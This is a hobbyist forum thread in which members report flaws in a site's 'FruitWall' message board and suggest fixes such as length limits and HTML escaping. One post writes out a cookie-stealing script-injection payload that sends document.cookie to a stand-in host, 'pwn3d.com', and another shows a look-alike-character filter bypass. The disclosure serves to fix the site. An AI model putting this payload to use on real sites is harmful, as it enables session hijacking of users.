PLA Forums

OMG IT'S TEH PLA! => All Things PLA => Topic started by: Godot on February 04, 2007, 06:43:31 PM

Title: Fruit Wall
Post by: Godot on February 04, 2007, 06:43:31 PM: What happened to the FruitWall?
Title: Re: Fruit Wall
Post by: gangals on February 04, 2007, 07:21:08 PM: If you look at the logs, someone from 149.9.0.57 has been abusing the wall.

http://phonelosers.org/php/fruitwall_log.html
Title: Re: Fruit Wall
Post by: Raptor on February 04, 2007, 07:23:33 PM: Quote from: gangals on February 04, 2007, 07:21:08 PM
If you look at the logs, someone from 149.9.0.57 has been abusing the wall.

http://phonelosers.org/php/fruitwall_log.html

damn, It's a good thing that message didn't end up getting displayed!
Title: Re: Fruit Wall
Post by: rbcp on February 04, 2007, 08:14:12 PM: It was displayed last night. That's when I took it down. There's a simple line I can add to the perl code of FruitWall to make that not happen anymore, but I've been lazy about it these past couple years. Once I get around to fixing it, I'll put it back up.
Title: Re: Fruit Wall
Post by: Godot on February 05, 2007, 03:09:49 PM: Oh, okay. I knew about the bug, but I didn't realize it was being used for abuse. I did post a few messages a while back slightly too long taunting people to try and repost them, just to have some fun, but I did not do anything extreme like that guy.
Title: Re: Fruit Wall
Post by: Godot on February 11, 2007, 07:42:15 PM: I just took a look at the FruitWall Perl code. You should be able to fix it by changing the line that reads
Code: [Select]
if ($ENV{'HTTP_REFERER'} =~ "$wallpage") {to
Code: [Select]
if ( ($ENV{'HTTP_REFERER'} =~ "$wallpage") && (length($lalalala) <= 75) ) {.
Title: Re: Fruit Wall
Post by: rbcp on February 28, 2009, 12:00:50 PM: Today I finally wrote a PHP version of FruitWall and put it up on the main page. Go look, try it out, and please post here if you find a way to hax0r me. As of now, the "color" and "link" options don't do anything, but I'm going to make those work soon. I think I've made it so html can't be posted into the form, but we'll see. I've also banned most numbers since people love posting phone numbers on it.
Title: Re: Fruit Wall
Post by: Godot on February 28, 2009, 12:07:05 PM: Yeah, you need to set a maximum length. I just set it to "abcdefghijklmnopqrstuvwxyz" repeated a bunch, and it screwed up your whole layout. And this time, put the limit in the PHP code, and not just in the HTML form like you did with the old Fruitwall.
Title: Re: Fruit Wall
Post by: rbcp on February 28, 2009, 12:08:56 PM: Quote from: Godot on February 28, 2009, 12:07:05 PM
Yeah, you need to set a maximum length. I just set it to "abcdefghijklmnopqrstuvwxyz" repeated a bunch, and it screwed up your whole layout. And this time, put the limit in the PHP code, and not just in the HTML form like you did with the old Fruitwall.

Thanks, I'm working on that now. And I DID put it in the perl code on the old one after a few years of just having it in the form.
Title: Re: Fruit Wall
Post by: rbcp on February 28, 2009, 12:27:20 PM: Got the length problem fixed. Only 80 characters are allowed now.

Next problem?
Title: Re: Fruit Wall
Post by: Godot on February 28, 2009, 01:35:37 PM: Quote from: rbcp on February 28, 2009, 12:27:20 PM
Next problem?

If a user is dumb enough to listen to somebody else who tells him to try to post a certain message to the Fruit Wall, that user could get his cookies stolen, which possibly could give the attacker access to his account.

The victim would be told to enter something like
Code: [Select]
<script>document.location="http://pwn3d.com/c.php?c="+document.cookie;</script> which would send his cookies to whoever runs pwn3d.com.

To fix it, just use htmlspecialchars($forbidden_text) instead of $forbidden_text when you output the "OMG WTF, you can't type..." error message.
Title: Re: Fruit Wall
Post by: rbcp on February 28, 2009, 02:25:42 PM: Quote from: Godot on February 28, 2009, 01:35:37 PM
The victim would be told to enter something like
Code: [Select]
<script>document.location="http://pwn3d.com/c.php?c="+document.cookie;</script> which would send his cookies to whoever runs pwn3d.com.

To fix it, just use htmlspecialchars($forbidden_text) instead of $forbidden_text when you output the "OMG WTF, you can't type..." error message.

Thanks for the tip. I just made it so it doesn't display what they're not allowed to type anymore.

Also, I decided to take away the ability to post colors or a link. I had those parts working, but with the link I couldn't figure out a good way to post both the link to change the message and the submitted link. And colors were just pointless. I've got it all logging everything with IP addresses now too.
Title: Re: Fruit Wall
Post by: Magus on February 28, 2009, 10:59:02 PM: Check the fruitwall --
I typed this and it worked:

OMG HAX!!! - Οne twο thrее fοur fivе ѕix sеven еight ninе tеn

You might want to ban most characters besides A-Z, underscores, hyphens, etc.
Title: Re: Fruit Wall
Post by: rbcp on March 01, 2009, 07:46:55 AM: Quote from: Magus on February 28, 2009, 10:59:02 PM
Check the fruitwall --
I typed this and it worked:

OMG HAX!!! - Οne twο thrее fοur fivе ѕix sеven еight ninе tеn

How'd you do that? Are you using those crazy ascii codes or something?
Title: Re: Fruit Wall
Post by: Magus on March 01, 2009, 10:38:04 AM: Quote from: rbcp on March 01, 2009, 07:46:55 AM
Quote from: Magus on February 28, 2009, 10:59:02 PM
Check the fruitwall --
I typed this and it worked:

OMG HAX!!! - Οne twο thrее fοur fivе ѕix sеven еight ninе tеn

How'd you do that? Are you using those crazy ascii codes or something?

ASCII = Yes.
It would seem that I'm also 31773 like you hacker folks.
Title: Re: Fruit Wall
Post by: rbcp on March 01, 2009, 12:35:02 PM: Quote from: Magus on March 01, 2009, 10:38:04 AM
ASCII = Yes.

Guess I'll just leave that hole open. Most of the people who post phone numbers hopefully won't know how to use leet methods like this.
Title: Re: Fruit Wall
Post by: linear on March 01, 2009, 01:16:02 PM: you lazy piece of shit